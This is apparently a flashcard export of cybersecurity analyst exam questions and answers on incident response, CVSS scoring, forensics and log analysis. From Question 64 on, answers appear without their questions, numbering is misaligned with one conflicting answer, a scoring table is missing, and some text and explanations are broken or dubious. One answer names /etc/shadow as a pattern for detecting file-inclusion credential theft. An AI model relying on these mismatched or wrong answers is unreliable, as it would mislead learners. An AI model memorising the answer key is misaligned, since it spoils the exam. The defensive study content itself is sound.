Information Sharing and Analysis Centers (ISACs) or other similar organizations are dedicated to sharing information about threats and vulnerabilities in specific sectors, including critical infrastructure and defense. Given the company’s role in the supply chain for a fighter jet, it would likely be a part of an industry-specific ISAC focused on defense or critical infrastructure. These organizations often have access to high-quality, vetted intelligence, including classified or sensitive information that may not be available through other channels. They also enable timely and relevant information sharing among members.

Question 59

Q

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

A. To satisfy regulatory requirements for incident reporting.
B. To hold other departments accountable.
C. To identify areas of improvement in the incident response process.
D. To highlight the notable practices of the organization’s incident response team.

Answer

A

C. To identify areas of improvement in the incident response process.

Lessons learned are a critical component of the incident response process. They serve the purpose of reflecting on what went well and what could have been done better during the incident response.

Question 60

Q

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

A. InLoud:
Cobain: Yes -
Grohl: No -
Novo: Yes -
Smear: Yes -
Channing: No

B. TSpirit:
Cobain: Yes -
Grohl: Yes -
Novo: Yes -
Smear: No -
Channing: No

C. ENameless:
Cobain: Yes -
Grohl: No -
Novo: Yes -
Smear: No -
Channing: No

D. PBleach:
Cobain: Yes -
Grohl: No -
Novo: No -
Smear: No -
Channing: Yes

Answer

A

B. TSpirit:

Cobain: Yes -
Grohl: Yes -
Novo: Yes -
Smear: No -
Channing: No

Question 61

Q

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

A. Hacktivist.
B. Advanced persistent threat.
C. Insider threat.
D. Script kiddie.

Answer

A

C. Insider threat.

An insider threat refers to a person within an organization (in this case, the user) who poses a threat to the organization’s security. Insider threats can be unintentional, such as when a user unknowingly downloads and spreads malware.

Question 62

Q

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity.
B. Restore the affected server to remove any malware.
C. Contact the appropriate government agency to investigate.
D. Research the malware strain to perform attribution.

Answer

A

A. Take a snapshot of the compromised server and verify its integrity.

The next action that the CSIRT should conduct after isolating the compromised server from the network
is to take a snapshot of the compromised server and verify its integrity. Taking a snapshot and verifying its integrity can help preserve and protect any evidence or information related to the incident, as well as prevent any tampering, contamination, or destruction of evidence.

Question 63

Q

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

A. Disk contents
B. Backup data
C. Temporary files
D. Running processes

Answer

A

D. Running processes

Question 64

Q

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }

B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

Answer

A

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region.

Answer 63

A

B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

This function takes an IP address as an argument and uses the geoiplookup command to get the geographic location information associated with the IP address, such as the country name, country code, region, city, or latitude and longitude. The function then prints the IP address and the geographic location information, which can help identify any IP addresses that belong to the same country.

Answer 64

A

D. Perform proper sanitization on all fields.

The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment.

Answer 65

A

B. Determine what attack the odd characters are indicative of.

In the context of reviewing web server logs, the most immediate and practical step is to investigate the nature of the odd characters in the request line. This involves understanding the patterns, syntax, and characteristics of these entries to determine if they are indicative of a particular attack or anomaly.

Simply shutting down the network (option A) or notifying law enforcement (option D) without understanding the nature of the issue might be premature and could disrupt normal operations unnecessarily. Utilizing the correct attack framework (option C) may come into play after identifying the attack type, but the initial focus should be on understanding the nature of the odd characters to assess the potential threat.

Answer 66

A

C. Incident response plan.

Answer 67

A

B. Block the IP range of the scans at the network firewall.

Option A, geo-blocking the offending country of origin, is not the best choice due to the negative impact, the possibility of evasion and the overly broad approach. Option B, blocking the IP range from scans at the network firewall, is the most appropriate as it is straightforward, effective, flexible, and strikes a better balance in addressing the specific issue without harming legitimate traffic. Therefore, the answer is B. In summary, option B is the most effective and balanced choice to mitigate the threat of network scanning activities originating from a country with which the company does not do business.

Answer 68

A

A. Limit user creation to administrators only.

Answer 69

A

C. Performing input validation before allowing submission.

Answer 70

A

D. Mean time to contain.

Mean time to contain is the metric that the cybersecurity team lead should include in the weekly executive briefs, as it measures how long it takes to stop the spread of malware that enters the network. Mean time to contain is the average time it takes to isolate and neutralize an incident or a threat, such as malware, from the time it is detected. Mean time to contain is an important metric for evaluating the effectiveness and efficiency of the incident response process, as well as the potential impact and damage of the incident or threat. A lower mean time to contain indicates a faster and more successful response, which can reduce the risk and cost of the incident or threat. Mean time to contain can also be compared with other metrics, such as mean time to detect or mean time to remediate, to identify gaps or areas for improvement in the incident response process.

Answer 71

A

A. Update the system firmware and reimage the hardware.

Answer 72

A

A. High GPU utilization.

Answer 73

A

C. Legal department.

Answer 74

A

B. The vulnerability is network based.

AV:N: vulnerability is network-based
AC:L: attack complexity is low
PR:N: privileges are not required to exploit the vulnerability
UI:N: no user interaction required
S:U: scope of the impact is unchanged (unchanged scope).
C:H: confidentiality impact is high.
I:H: integrity impact is high.
A:H: availability impact is high.

Answer 75

A

D. 4

Question states the “company is primarily concerned with ensuring the accuracy of the data”, or integrity in other words. Preserving the integrity of the data is important. So we will prioritize vulnerabilities that affect integrity (I in the CVSS 3.1 metrics)

V1 - I:L means integrity risk is low
V2 - I:L means integrity risk is low
V3 - I:N means integrity risk is none
V4 - I:H means integrity risk is high

Answer 76

A

A. Generate a hash value and make a backup image.

Answer 77

A

A. To test possible incident scenarios and how to react properly.

A tabletop exercise is a type of simulation exercise that involves testing possible incident scenarios and how to react properly, without actually performing any actions or using any resources. A tabletop exercise is usually conducted by a facilitator who presents a realistic scenario to a group of participants, such as a cyberattack, a natural disaster, or a data breach. The participants then discuss and evaluate their roles, responsibilities, plans, procedures, and policies for responding to the incident, as well as the potential impacts and outcomes. A tabletop exercise can help identify strengths and weaknesses in the incident response plan, improve communication and coordination among the stakeholders, raise awareness and preparedness for potential incidents, and provide feedback and recommendations for improvement.

Answer 78

A

D. The digital certificate on the web server was self-signed.

A digital certificate is a document that contains the public key and identity information of a web server, and is signed by a trusted third-party authority called a certificate authority (CA). A digital certificate allows the web server to establish a secure connection with the clients using the HTTPS protocol, and also verifies the authenticity of the web server. A self-signed certificate is a digital certificate that is not signed by a CA, but by the web server itself. A self-signed certificate can cause issues with the website, as it may not be trusted by the clients or their browsers. Clients may receive warnings or errors when trying to access the website,
indicating that the site could not be trusted or that the connection is not secure.

Answer 79

A

A. Log entry 1

This entry appears to contain a command injection attempt in the URL using Java’s Runtime class.

Answer 80

A

D. Determine the asset value of each system.

Answer 81

A

C. A new program has been set to execute on system start.

Answer 82

A

C. The host is allowing insecure cipher suites.

The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites. Cipher suites are combinations of cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the cipher suites that are supported by the server, along with a letter grade (A through F) indicating the strength of the connection. The output also shows the least strength, which is the strength of the weakest cipher offered by the server. In this case, the least strength is F, which means that the server is allowing insecure cipher suites that are vulnerable to attacks or have been deprecated. For example, the output shows that the server supports SSLv3, which is an outdated and insecure protocol that is susceptible to the POODLE attack. The output also shows that the server supports RC4, which is a weak and broken stream cipher that should not be used. Therefore, the best description of the output is that the host is allowing insecure cipher suites. The other descriptions are not accurate, as they do not reflect what the output shows. The host is not up or responding is incorrect, as the output clearly shows that the host is up and responding to the scan. The host is running excessive cipher suites is incorrect, as the output does not indicate how many cipher suites the host is running, only which ones it supports. The Secure Shell port on this host is closed is incorrect, as the output does not show anything about port 22, which is the default port for Secure Shell (SSH). The output only shows information about port 443, which is the default port for HTTPS.

Answer 83

A

A. Update the system firmware and reimage the hardware.

Updating the system firmware and reimaging the hardware is the best action to perform to remediate the infected device, as it helps to ensure that the device is restored to a clean and secure state and that any traces of malware are removed.

Answer 84

A

A. /etc/shadow

/etc/shadow is the pattern that the security analyst can use to search the web server logs for evidence of exploitation of the LFI vulnerability that can be exploited to extract credentials from the underlying host. LFI stands for Local File Inclusion, which is a vulnerability that allows an attacker to include local files on the web server into the output of a web application. LFI can be exploited to extract sensitive information from the web server, such as configuration files, passwords, or source code. The /etc/shadow file is a file that stores the encrypted passwords of all users on a Linux system. If an attacker can exploit the LFI vulnerability to include this file into the web application output, they can obtain the credentials of the users on the web server. Therefore, the security analyst can look for /etc/shadow in the request line of the web server logs to see if any attacker has attempted or succeeded in exploiting the LFI vulnerability.

Answer 85

A

D. Cross-site scripting

XSS is a type of web application attack that exploits the vulnerability of a web server or browser to execute malicious scripts or commands on the client-side. XSS attackers inject malicious code, such as JavaScript, VBScript, HTML, or CSS, into a web page or application that is viewed by other users. The malicious code can then access or manipulate the user’s session, cookies, browser history, or personal information, or perform actions on behalf of the user, such as stealing credentials, redirecting to phishing sites, or installing malware12
The line in the web server log shows an example of an XSS attack using VBScript. The attacker tried to insert an <img></img> tag with a malicious SRC attribute that contains a VBScript code. The VBScript code is intended to display a message box with the text “test” when the user views the web page or application. This is a simple and harmless example of XSS, but it could be used to test the vulnerability of the web server or browser, or to launch more sophisticated and harmful attacks.

Answer 86

A

B. Deploy EDR on the web server and the database server to reduce the adversaries capabilities.
D. Use micro segmentation to restrict connectivity to/from the web and database servers.

Deploying EDR on the web server and the database server to reduce the adversaries capabilities and using micro segmentation to restrict connectivity to/from the web and database servers are two compensating controls that will help contain the adversary while meeting the other requirements. A compensating control is a security measure that is implemented to mitigate the risk of a vulnerability or an attack when the primary control is not feasible or effective. EDR stands for Endpoint Detection and Response, which is a tool that monitors endpoints for malicious activity and provides automated or manual response capabilities. EDR can help contain the adversary by detecting and blocking their actions, such as data exfiltration, lateral movement, privilege escalation, or command execution. Micro segmentation is a technique that divides a network into smaller segments based on policies and rules, and applies granular access controls to each segment. Micro segmentation can help contain the adversary by isolating the web and database servers from other parts of the network, and limiting the traffic that can flow between them.

Answer 87

A

A. SLA

SLA (Service Level Agreement) is the best term to describe the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m., as it reflects the agreement between a service provider and a customer that specifies the services, quality, availability, and responsibilities that are agreed upon.

An SLA is a common type of document that is used in various industries and contexts, such as IT, telecom, cloud computing, or outsourcing. An SLA typically includes metrics and indicators to measure the performance and quality of the service, such as uptime, response time, or resolution time. An SLA also defines the consequences or remedies for any breaches or failures of the service, such as penalties, refunds, or credits. An SLA can help to manage customer expectations, formalize communication, improve productivity, and strengthen relationships. The other terms are not as accurate as SLA, as they describe different types of documents or concepts.

LOI (Letter of Intent) is a document that outlines the main terms and conditions of a proposed agreement between two or more parties, before a formal contract is signed. An LOI is usually non-binding and expresses the intention or interest of the parties to enter into a future agreement. An LOI can help to clarify the key points of a deal, facilitate negotiations, or demonstrate commitment.

MOU (Memorandum of Understanding) is a document that describes a mutual agreement or cooperation between two or more parties, without creating any legal obligations or commitments. An MOU is
usually more formal than an LOI, but less formal than a contract. An MOU can help to establish a common ground, define roles and responsibilities, or outline expectations and goals.

KPI (Key Performance Indicator) is a concept that refers to a measurable value that demonstrates how effectively an organization or individual is achieving its key objectives or goals. A KPI is usually quantifiable and specific, such as revenue growth, customer satisfaction, or employee retention. A KPI can help to track progress, evaluate performance, or identify areas for improvement.

Answer 88

A

C. Agent-based scanning

Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console.

Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network.

Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

Answer 89

A

C. 23
D. 636

The output shows the results of a port scan, which is a technique used to identify open ports and services running on a network host. Port scanning can be used by attackers to discover potential vulnerabilities and exploit them, or by defenders to assess the security posture and configuration of their network devices. The output lists six ports that are open on the target host, along with the service name and version associated with each port. The service name indicates the type of application or protocol that is using the port, while the version indicates the specific release or update of the service. The service name and version can provide useful information for both attackers and defenders, as they can reveal the capabilities, features, and weaknesses of the service.

Among the six ports listed, two are particularly risky and should be investigated further by the security team: port 23 and port 636.

Port 23 is used by Telnet, which is an old and insecure protocol for remote login and command execution. Telnet does not encrypt any data transmitted over the network, including usernames and passwords, which makes it vulnerable to eavesdropping, interception, and modification by attackers. Telnet also has many known vulnerabilities that can allow attackers to gain unauthorized access, execute arbitrary commands, or cause denial-of-service attacks on the target host.

Port 636 is used by LDAP over SSL/TLS (LDAPS), which is a protocol for accessing and modifying directory services over a secure connection. LDAPS encrypts the data exchanged between the client and the server using SSL/TLS certificates, which provide authentication, confidentiality, and integrity. However, LDAPS can also be vulnerable to attacks if the certificates are not properly configured, verified, or updated. For example, attackers can use self-signed or expired certificates to perform man-in-the-middle attacks, spoofing attacks, or certificate revocation attacks on LDAPS connections. Therefore, the security team should investigate further why port 23 and port 636 are open on the target host, and what services are running on them. The security team should also consider disabling or replacing these services with more secure alternatives, such as SSH for port 23 and StartTLS for port 6362.

Answer 90

A

B. Adversary emulation

Adversary emulation is a technique that involves mimicking the tactics, techniques, and procedures (TTPs) of a specific threat actor or group to test the effectiveness of the security controls and incident response capabilities of an organization.

Adversary emulation can help identify and address the gaps and weaknesses in the security posture of an organization, as well as improve the readiness and skills of the security team.

Adversary emulation can also help measure the dwell time, which is the duration that a threat actor remains undetected inside the network. The other options are not the best techniques to meet the CISO’s goals.

Vulnerability scanning (A) is a technique that involves scanning the network and systems for known vulnerabilities, but it does not simulate a real attack or test the incident response capabilities.

Passive discovery (C) is a technique that involves collecting information about the network and systems without sending any packets or probes, but it does not identify or exploit any vulnerabilities or test the security controls.

Bug bounty (D) is a program that involves rewarding external researchers or hackers for finding and reporting vulnerabilities in an organization’s systems or applications, but it does not focus on a specific threat actor or group.

Answer 91

A

C. host03

Host03 should be patched first, based on the metrics, as it has the highest risk score and the highest number of critical vulnerabilities. The risk score is calculated by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Host03 has a risk score of 10 x 0.9 = 9, which is higher than any other host. Host03 also has 5 critical vulnerabilities, which are the most severe and urgent to fix, as they can allow remote code execution, privilege escalation, or data loss. The other hosts have lower risk scores and lower numbers of critical vulnerabilities, so they can be patched later.

Answer 92

A

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is:

function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region.

Answer 93

A

B. The vulnerability is network based.

The vulnerability is network based is the correct attribute that describes this vulnerability, as it can be inferred from the CVSS string. CVSS stands for Common Vulnerability Scoring System, which is a framework that assigns numerical scores and ratings to vulnerabilities based on their characteristics and severity.

The CVSS string consists of several metrics that define different aspects of the vulnerability, such as the attack vector, the attack complexity, the privileges required, the user interaction, the scope, and the impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector (AV), which
indicates how the vulnerability can be exploited. The value of AV in this case is N, which stands for network. This means that the vulnerability can be exploited remotely over a network connection, without physical or logical access to the target system. Therefore, the vulnerability is network based.

Answer 94

A

A. Avoid

Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

Answer 95

A

D. Make a forensic image of the device and create a SHA1 hash.

Making a forensic image of the device and creating a SHA1 hash is the best step to preserve evidence, as it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of the device’s storage media, which preserves all the information on the device, including deleted or hidden files. A SHA1 hash is a cryptographic value that is calculated from the forensic image, which can be used to prove that the image has not been altered or tampered with. The other options are not as effective as making a forensic image and creating a SRA-I hash, as they may not capture all the relevant data, or they may not provide sufficient verification of the evidence’s authenticity.

Answer 96

A

A. Clone the virtual server for forensic analysis.

The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations.

Answer 97

A

C. CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Answer 98

A

A. Deploy a CASB and enable policy enforcement.

A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior.

Answer 99

A

A. Increasing training and awareness for all staff.

Increasing training and awareness for all staff is the best way to address the issue of employees being enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. This issue is an example of social engineering, which is a technique that exploits human psychology and behavior to manipulate people into performing actions or divulging information that benefit the attackers. Social engineering can take many forms, such as phishing, vishing, baiting, quid pro quo, or impersonation. The best defense against social engineering is to educate and train the staff on how to recognize and avoid common social engineering tactics.

Answer 100

A

C. Use application security scanning as part of the pipeline for the CI/CD flow.

Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers.

Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and frequently as part of the CI/CD process.

Answer 101

A

C. DNS

A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a target’s network or server with a large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet and prevent users from accessing external SaaS resources.

Answer 102

A

D. Conduct regular code reviews using OWASP best practices.

Conducting regular code reviews using OWASP best practices is the most effective action to reduce risks associated with the application development. Code reviews are a systematic examination of the source code of an application to detect and fix errors, vulnerabilities, and weaknesses that may compromise the security, functionality, or performance of the application. Code reviews can help to improve the quality and security of the code, as well as to identify and remediate common security risks, such as insufficient logging capabilities. OWASP (Open Web Application Security Project) is a global nonprofit organization that provides free and open resources, tools, standards, and best practices for web application security. OWASP best practices for logging include following a common logging format and approach, logging relevant security events and data, protecting log data from unauthorized access or modification, and using log analysis and monitoring tools to detect and respond to security incidents. By following OWASP best practices for logging, developers can ensure that their web applications have sufficient and effective logging capabilities that can help to prevent, detect, and mitigate security threats.

Answer 103

A

A. Vulnerability A

Answer 104

A

B. Replace the current MD5 with SHA-256.

The vulnerability that the security analyst is able to exploit is a hash collision, which is a situation where two different files produce the same hash value. Hash collisions can allow an attacker to bypass the integrity or authentication checks that rely on hash values, and submit malicious files to the system. The web application uses MD5, which is a hashing algorithm that is known to be vulnerable to hash collisions. Therefore, the analyst should suggest replacing the current MD5 with SHA-256, which is a more secure and collision-resistant hashing algorithm. The other options are not the best suggestions to mitigate the vulnerability with the fewest changes to the current script and infrastructure. Deploying a WAF (web application firewall) to the front of the application (A) may help protect the web application from some common attacks, but it may not prevent hash collisions or detect malicious files. Deploying an antivirus application on the hosting system (C) may help scan and remove malicious files from the system, but it may not prevent hash collisions or block malicious files from being submitted. Replacing the MD5 with digital signatures (D) may help verify the authenticity and integrity of the files, but it may require significant changes to the current script and infrastructure, as digital signatures involve public-key cryptography and certificate authorities.

Answer 105

A

D. The MTTR decreases by 20%.

Answer 106

A

A. Chain of custody

Answer 107

A

A. Impact

Answer 108

A

A. VM_PRD_DB

Answer 109

A

C. Establish a chain of custody starting with the attorney’s request.

Answer 110

A

A. OpenVAS

Answer 111

A

C. Impact

Answer 112

A

D. Identify the IP/hostname for the requests and look at the related activity.

Answer 113

A

C. Redis Server

Answer 114

A

D. Data exfiltration

Answer 115

A

B. Root cause analysis

Answer 116

A

D. MITRE ATT&CK

Answer 117

A

C. Group C

Answer 118

A

C. Harden systems by disabling or removing unnecessary services.

Answer 119

A

B. The scanner is running in active mode.

Answer 120

A

D. Encryption
F. Access controls

Answer 121

A

A. Establish quarterly SDLC training on the top vulnerabilities for developers.

Answer 122

A

D. Transfer

Answer 123

A

B. Discovery scan

Answer 124

A

B. True negative

Answer 125

A

A. Credentialed scan

Answer 126

A

C. Unauthorized changes

Answer 127

A

D. great.skills

Answer 128

A

C. Review the steps that the previous analyst followed.

Answer 129

A

A. Compensating controls

Answer 130

A

D. Search for other mail users who have received the same file.

Answer 131

A

C. Mitigate

Answer 132

A

A. Mean time to detect.

Answer 133

A

B. Configure the servers to forward logs to a SIEM.

Answer 134

A

A. Perform a tabletop drill based on previously identified incident scenarios.

Answer 135

A

C. Quarantine the server.

Answer 136

A

B. Allowlisting

Answer 137

A

A. Header analysis

Answer 138

A

A. The message fails a DMARC check.

Answer 139

A

A. Data masking

Answer 140

A

A. 25 minutes

Answer 141

A

D. Deploy a scanner sensor on every segment and perform credentialed scans.

Answer 142

A

B. Password changes

Answer 143

A

C. Add data enrichment for IPs in the ingestion pipeline.

Answer 144

A

A. Integrate an IT service delivery ticketing system to track remediation and closure.

Answer 145

A

D. AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

Answer 146

A

A. Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level.
F. Examine the SPF, DKIM, and DMARC fields from the original email.

Answer 147

A

C. tcpdump -n -r packets.pcap host [IP address]

Answer 148

A

A. A well-defined timeline of the events.

Answer 149

A

B. TCPDump

Answer 150

A

C. Check configurations to determine whether USB ports are enabled on company assets.

Answer 151

A

A. Implement segmentation with ACLs.

Answer 152

A

D. #!/bin/bash
netstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

Answer 153

A

C. Automation

Answer 154

A

D. The root cause analysis identifies the contributing items that facilitated the event.

Answer 155

A

A. Any discovered vulnerabilities will not be remediated.

Answer 156

A

C. Time synchronization

Answer 157

A

B. Decommission the proxy.

Answer 158

A

B. Passive scanning

Answer 159

A

B. Registry key values

Answer 160

A

D. A social engineering attack is underway.

Answer 161

A

D. Registry

Answer 162

A

C. Nation-state

Answer 163

A

C. Hard-coded credential

Answer 164

A

B. Execute commands through an unsecured service account.

Answer 165

A

D. Beaconing

Brainscape's Knowledge GenomeTM

examtopics.com Flashcards

Brainscape's Knowledge Genome^TM